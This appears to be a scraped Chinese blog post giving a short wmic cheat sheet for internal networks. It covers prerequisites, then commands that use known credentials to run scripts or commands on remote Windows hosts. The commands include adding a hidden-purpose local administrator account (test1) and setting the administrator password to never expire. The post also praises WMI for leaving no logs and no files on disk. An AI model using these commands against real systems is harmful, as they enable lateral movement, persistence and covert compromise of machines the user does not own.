zoukankan      html  css  js  c++  java
  • wmic 内网使用

    先决条件:

    1、远程服务器启动Windows Management Instrumentation服务,开放TCP135端口,防火墙放开对此端口的流量(默认放开);

    2、远程服务器的本地安全策略的“网络访问: 本地帐户的共享和安全模式”应设为“经典-本地用户以自己的身份验证”

    3、已知远程服务器或者主机的账号密码

    wmic /node:”192.168.1.20″ /user:”domainadministrator” /password:”123456″

    ### wmic  
    WMI 的全称是 Windows Management Instrumentation,它出现在所有的 Windows操作系统中,并由一组强大的工具集合组成,用于管理本地或远程的 Windows 系统,攻击者使用 wmi 来进行攻击,但 Windows 系统默认不会在日志中记录这些操作,可以做到无日志,攻击脚本无需写入到磁盘,增加了隐蔽性。推荐使用 wmic 进行远程执行命令。

    常用命令
    在远程系统上执行 bat 脚本

    1. wmic /node:192.168.17.138 /user:test /password:!@#123QWE process call create c:programdata est.bat

    在远程系统上执行单条命令

    1. wmic /node:192.168.17.138 /user:test /password:!@#123QWE process call create "cmd.exe /c net user test1 !@#123QWE /add && net localgroup administrators test1 /add

    工具说明
    1、需要远程系统启动 Windows Management Instrumentation 服务,开放135端口
    2、远程系统的本地安全策略的“网络访问: 本地帐户的共享和安全模式”应设为“经典-本地用户以自己的身份验证”
    3、wmic 会以管理员权限在远程系统上执行命令
    4、防火墙开启将无法连接
    5、如果报错 “Invalid Global Switch” ,用双引号把包含-的结点括起来即可正常执行。

    wmic设置密码永不过期

    1. wmic useraccount where name="administrator" set passwordexpires=false
  • 相关阅读:
    python_16(bootstrap)
    python_15(jquery)
    python_14(js)
    .net 定义泛型方法解析XML数据赋值给相应对象
    SQL Server 数字字符串位数不够补0
    SQL Server 跨服务器查询
    JQ1.5 为动态追加的元素添加事件
    radio group 的change 事件
    记录兼职工作中遇到的问题-IIS 服务器站点无法启动
    记录第一份工作的最后一次需求-百分比环形进度条
  • 原文地址:https://www.cnblogs.com/0xdd/p/11393392.html
Copyright © 2011-2022 走看看